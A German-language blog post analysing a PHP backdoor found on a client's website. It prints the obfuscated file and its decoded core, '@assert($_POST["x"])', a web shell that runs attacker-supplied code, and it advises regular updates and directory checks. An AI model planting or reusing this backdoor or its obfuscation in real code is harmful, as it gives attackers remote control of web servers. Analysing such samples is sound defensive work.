Über den Author / Sicherheit / PHP Trojaner mit php assert()

PHP Trojaner mit php assert()

~2 Min. Lesezeit

Für einen Kunden sollte ich eine Offerte erstellen um seine Seite technisch zu optimieren für Google. DAbei ist mir eine seltsame DAtei aufgefallen mit dem Namen s26e2.php.

Der Inhalt der Datei sieht folgendermassen aus (unschädlich gemacht:

${"\x47L\x4f\x42\x41LS"}["\x6c\x68\x73l\x61wk"]="c";$kvbemdpsn="c";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x78a\x77\x67\x6d\x6d\x70\x6c\x77o"]="b\x6b\x66";${"GLOB\x41L\x53"}["\x70tx\x75\x76\x74uij\x6d"]="\x76bl";${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x6f\x6fl\x72\x7a"]="\x62\x6b\x66";${${"\x47\x4cO\x42\x41\x4c\x53"}["p\x74xu\x76\x74\x75\x69\x6a\x6d"]}=str_replace("\x74\x69","","\x74\x69st\x69t\x74ir\x74i\x5frt\x69\x65\x74\x69pl\x74i\x61t\x69\x63\x65");${${"G\x4cO\x42\x41\x4cS"}["\x68\x78\x61\x77gm\x6d\x70\x6c\x77\x6f"]}=${${"G\x4c\x4f\x42\x41\x4cS"}["\x70t\x78\x75\x76\x74\x75ijm"]}("\x6b","","\x6b\x62\x61k\x73\x6b\x65\x36\x6b\x34k\x5fkdk\x65\x6b\x63\x6b\x6f\x6b\x64ke");${${"\x47L\x4f\x42ALS"}["lh\x73\x6c\x61\x77\x6b"]}=${${"\x47\x4cO\x42B\x4c\x53"}["g\x6f\x6f\x6cr\x7a"]}("YX\x4ezZX\x49=").$_GET["n"]."\x74";@${$kvbemdpsn}($_POST["x"]);echo "a\x62c\x61\x62cab\x63\n";

Schlüsselt man diese Datei auf und entfernt alles was man nicht benötigt, kommt dies raus:

@assert($_POST["x"]);
echo "abcabcabc\n";

Klar könnte man den letzten Teil auch noch entfernen… Nette Datei, entschlüsselt in rund 15 Minuten und wieder was gelernt, denn die Funktion habe ich tatsächlich noch nie genutzt oder gwas davon gehört…

Hätte der Kunde seine Updates schön gemacht (Fremdhoster) dann wäre dies vermutlich nicht passiert. Ob die Seite noch mehr Infektionen hat, ist mir unbekannt, da ich nicht danach gesucht habe und aktuell keinen Bereinigungsauftrag habe.

Es macht Sinn, ab und zu die Verzeichnisse durchzuschauen, ob seltsame Dateien drin liegen ;)

About Stefan

Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

Update WordPress Admin E-Mail ohne Bestätigung

~0 Min. LesezeitDie generelle E-Mailadresse von WordPress, welche unter Einstellungen angegeben ist, kann nicht mehr …

WordPress zeigt Updates, aber diese werden nicht aufgelistet?

~0 Min. LesezeitDas Problem kann 2 Ursachen haben: Templates haben andere Module integriert, welche zwar …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.